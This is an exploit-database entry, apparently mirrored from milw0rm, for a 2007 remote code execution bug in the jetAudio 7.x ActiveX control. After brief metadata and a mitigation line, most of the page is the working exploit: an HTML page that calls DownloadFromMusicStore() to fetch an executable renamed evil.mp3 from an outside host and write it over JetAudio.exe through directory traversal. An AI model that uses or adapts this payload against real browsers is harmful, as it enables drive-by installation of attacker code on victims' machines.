header-logo
Suggest Exploit
vendor:
jetAudio
by:
Krystian Kloskowski (h07)
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: jetAudio
Affected Version From: jetAudio 7.x
Affected Version To: jetAudio 7.x
Patch Exists: NO
Related CWE:
CPE: a:jetaudio:jetaudio:7.x
Metasploit:
Other Scripts:
Platforms Tested: Windows (Microsoft Internet Explorer 6)
2007

jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit

This exploit targets the DownloadFromMusicStore() function in the jetAudio 7.x ActiveX control. It allows an attacker to remotely execute arbitrary code on a vulnerable system. The bug was discovered by Krystian Kloskowski (h07) and has been tested on jetAudio 7.0.3 Basic with Microsoft Internet Explorer 6.

Mitigation:

Apply the latest security patches and updates for jetAudio. Consider disabling or removing the vulnerable ActiveX control if not needed.
Source

Exploit-DB raw data:

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;) 
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://192.168.0.1/evil.mp3";
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

# milw0rm.com [2007-09-19]